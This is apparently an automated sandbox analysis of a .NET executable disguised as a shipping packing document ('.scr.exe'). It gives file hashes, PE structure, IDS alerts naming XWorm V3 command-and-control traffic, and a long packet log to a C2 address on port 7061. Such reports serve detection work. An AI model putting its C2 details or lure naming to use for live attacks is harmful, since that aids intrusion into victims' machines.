Entropy (8bit):	7.9012989047954045
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
File size:	523'776 bytes
MD5:	632f722953592e348c533977a5f251d7
SHA1:	d4e62b7060f00888d43eb1fbb0d0f8f5fbd8ef4d
SHA256:	4978a378806fd5d68c08ad4602f80d3f5f1f870cb072475bd32b7a8ca32a3d88
SHA512:	1b41503d38a2862e499ec5c21c7510cb8a95676eb5eca546910ddddf09a1c1aaf0216c572119f0c3ffc0f7a0a4516823cae9f32b27bea381c03d4c07dcaaee56
SSDEEP:	12288:HCfia2Q+RH4w8yqJ3ItYvk71CyBC7Lkf/:HYiHQ+R5jYc7p
TLSH:	ACB4124477F88B22E1BDB7F600BA101213B2715B6875F24C4DCA70DE1977F5A8A68B27
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x48109a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC6141E0D [Tue Apr 23 01:06:21 2075 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x81048	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x82000	0x630	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x84000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7ef28	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7f0a0	0x7f200	6b9c1792f68c8e35c39b6b6a53b4877a	False	0.9334074637413963	data	7.913792552903148	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x82000	0x630	0x800	48f20fd58abc697606cd0f978027f461	False	0.33935546875	data	3.4825336698503278	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x84000	0xc	0x200	40593a9195eccbd5fd641478f7316520	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x82090	0x3a0	data			0.4234913793103448
RT_MANIFEST	0x82440	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-27T00:29:25.629966+0200	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.5	50000	104.250.180.178	7061	TCP
2024-10-27T00:30:12.770580+0200	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.5	50004	104.250.180.178	7061	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 00:26:32.023667097 CEST	49771	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:32.031017065 CEST	7061	49771	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:32.031078100 CEST	49771	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:32.194526911 CEST	49771	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:32.201822042 CEST	7061	49771	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:40.516508102 CEST	7061	49771	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:40.519107103 CEST	49771	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:40.598805904 CEST	49771	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:40.599556923 CEST	49818	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:40.605700970 CEST	7061	49771	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:40.606348991 CEST	7061	49818	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:40.606427908 CEST	49818	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:40.622102976 CEST	49818	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:40.627542019 CEST	7061	49818	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:49.084352016 CEST	7061	49818	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:49.084469080 CEST	49818	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:50.723795891 CEST	49818	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:50.724903107 CEST	49876	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:50.729545116 CEST	7061	49818	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:50.730324030 CEST	7061	49876	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:50.730499983 CEST	49876	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:50.746656895 CEST	49876	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:26:50.752100945 CEST	7061	49876	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:59.208713055 CEST	7061	49876	104.250.180.178	192.168.2.5
Oct 27, 2024 00:26:59.208780050 CEST	49876	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:01.942384958 CEST	49876	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:01.944250107 CEST	49933	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:02.132255077 CEST	7061	49876	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:02.132268906 CEST	7061	49933	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:02.132339954 CEST	49933	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:02.149369001 CEST	49933	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:02.156785011 CEST	7061	49933	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:10.609901905 CEST	7061	49933	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:10.610255003 CEST	49933	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:12.786293983 CEST	49933	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:12.787046909 CEST	49987	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:12.802433014 CEST	7061	49933	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:12.802476883 CEST	7061	49987	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:12.802557945 CEST	49987	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:12.817019939 CEST	49987	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:12.824839115 CEST	7061	49987	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:21.306914091 CEST	7061	49987	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:21.307080030 CEST	49987	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:21.848625898 CEST	49987	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:21.850296974 CEST	49988	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:21.854110956 CEST	7061	49987	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:21.855703115 CEST	7061	49988	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:21.855779886 CEST	49988	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:21.873297930 CEST	49988	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:21.878618956 CEST	7061	49988	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:30.332839966 CEST	7061	49988	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:30.332918882 CEST	49988	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:30.646327019 CEST	49988	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:30.648400068 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:30.653553963 CEST	7061	49988	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:30.655755043 CEST	7061	49989	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:30.655837059 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:30.670666933 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:30.677934885 CEST	7061	49989	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:34.195207119 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:34.202985048 CEST	7061	49989	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:34.223742008 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:34.230730057 CEST	7061	49989	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:34.255121946 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:34.262260914 CEST	7061	49989	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:34.442970991 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:34.449665070 CEST	7061	49989	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:39.168576956 CEST	7061	49989	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:39.168708086 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:39.629862070 CEST	49989	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:39.631444931 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:39.635302067 CEST	7061	49989	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:39.637056112 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:39.637130022 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:39.662761927 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:39.668237925 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:43.661448002 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:43.667036057 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:44.802005053 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:44.807879925 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:44.833112955 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:44.838498116 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:44.848828077 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:44.854279995 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:44.926963091 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:44.932394981 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:44.958221912 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:44.963634014 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:45.161271095 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:45.166863918 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:48.265593052 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:48.265754938 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:50.239227057 CEST	49990	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:50.243237972 CEST	49991	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:50.246534109 CEST	7061	49990	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:50.250360012 CEST	7061	49991	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:50.250623941 CEST	49991	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:50.351874113 CEST	49991	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:50.358872890 CEST	7061	49991	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:55.757077932 CEST	49991	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:27:55.762685061 CEST	7061	49991	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:58.739495039 CEST	7061	49991	104.250.180.178	192.168.2.5
Oct 27, 2024 00:27:58.739577055 CEST	49991	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:00.442620993 CEST	49991	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:00.451025009 CEST	7061	49991	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:00.451070070 CEST	49992	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:00.459347963 CEST	7061	49992	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:00.459516048 CEST	49992	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:00.563594103 CEST	49992	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:00.569257975 CEST	7061	49992	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:03.114362001 CEST	49992	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:03.122143030 CEST	7061	49992	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:04.458231926 CEST	49992	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:04.466005087 CEST	7061	49992	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:08.939930916 CEST	7061	49992	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:08.939996958 CEST	49992	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:10.817373037 CEST	49992	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:10.820146084 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:10.824944019 CEST	7061	49992	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:10.827663898 CEST	7061	49993	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:10.827761889 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:10.865375042 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:10.873071909 CEST	7061	49993	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:10.880162001 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:10.887516975 CEST	7061	49993	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:10.895761013 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:10.902986050 CEST	7061	49993	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:11.005096912 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:11.012680054 CEST	7061	49993	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:11.051909924 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:11.059195042 CEST	7061	49993	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:19.309781075 CEST	7061	49993	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:19.309859037 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:21.145417929 CEST	49993	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:21.148000956 CEST	49994	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:21.152895927 CEST	7061	49993	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:21.155092001 CEST	7061	49994	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:21.155174971 CEST	49994	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:21.193830013 CEST	49994	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:21.200650930 CEST	7061	49994	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:21.223762989 CEST	49994	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:21.230798006 CEST	7061	49994	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:29.641233921 CEST	7061	49994	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:29.641307116 CEST	49994	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:31.270422935 CEST	49994	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:31.273842096 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:31.276205063 CEST	7061	49994	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:31.279371977 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:31.279448032 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:31.309981108 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:31.315373898 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:35.317565918 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:35.323016882 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:37.020689964 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:37.026335001 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:37.083039999 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:37.088531017 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:37.176976919 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:37.182398081 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:37.270688057 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:37.276048899 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:37.317439079 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:37.322751045 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:39.763938904 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:39.764035940 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:42.543301105 CEST	49995	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:42.544399023 CEST	49996	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:42.548831940 CEST	7061	49995	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:42.549720049 CEST	7061	49996	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:42.550041914 CEST	49996	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:42.636393070 CEST	49996	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:42.641876936 CEST	7061	49996	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:47.755204916 CEST	49996	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:47.761085987 CEST	7061	49996	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:47.802067041 CEST	49996	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:47.807627916 CEST	7061	49996	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:51.037718058 CEST	7061	49996	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:51.037791967 CEST	49996	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:53.020832062 CEST	49996	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:53.024642944 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:53.026469946 CEST	7061	49996	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:53.030215979 CEST	7061	49997	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:53.030311108 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:53.146646976 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:53.152421951 CEST	7061	49997	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:53.223830938 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:53.229315042 CEST	7061	49997	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:53.239454985 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:53.244961023 CEST	7061	49997	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:53.379993916 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:53.385498047 CEST	7061	49997	104.250.180.178	192.168.2.5
Oct 27, 2024 00:28:57.505120993 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:28:57.510802031 CEST	7061	49997	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:01.528266907 CEST	7061	49997	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:01.528495073 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:03.629800081 CEST	49997	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:03.631916046 CEST	49998	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:03.638360023 CEST	7061	49997	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:03.640819073 CEST	7061	49998	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:03.640897989 CEST	49998	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:03.665122032 CEST	49998	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:03.673780918 CEST	7061	49998	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:12.138124943 CEST	7061	49998	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:12.140269041 CEST	49998	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:13.821517944 CEST	49998	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:13.828308105 CEST	7061	49998	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:13.829361916 CEST	49999	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:13.836158037 CEST	7061	49999	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:13.836256027 CEST	49999	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:13.979674101 CEST	49999	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:13.985099077 CEST	7061	49999	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:22.324546099 CEST	7061	49999	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:22.324764967 CEST	49999	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:24.864432096 CEST	49999	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:24.868335009 CEST	50000	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:24.918519974 CEST	7061	49999	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:24.918540001 CEST	7061	50000	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:24.918623924 CEST	50000	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:24.964183092 CEST	50000	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:24.970691919 CEST	7061	50000	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:25.629966021 CEST	50000	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:25.635509014 CEST	7061	50000	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:33.412190914 CEST	7061	50000	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:33.412317038 CEST	50000	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:35.129792929 CEST	50000	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:35.133419037 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:35.137582064 CEST	7061	50000	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:35.141072989 CEST	7061	50001	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:35.141149044 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:35.177448988 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:35.184932947 CEST	7061	50001	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:39.098735094 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:39.106328011 CEST	7061	50001	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:39.317528963 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:39.324987888 CEST	7061	50001	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:41.020649910 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:41.334569931 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:41.336533070 CEST	7061	50001	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:41.342155933 CEST	7061	50001	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:43.620208025 CEST	7061	50001	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:43.620282888 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:45.270365953 CEST	50001	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:45.274427891 CEST	50002	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:45.276813984 CEST	7061	50001	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:45.279927015 CEST	7061	50002	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:45.280016899 CEST	50002	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:45.307862043 CEST	50002	7061	192.168.2.5	104.250.180.178
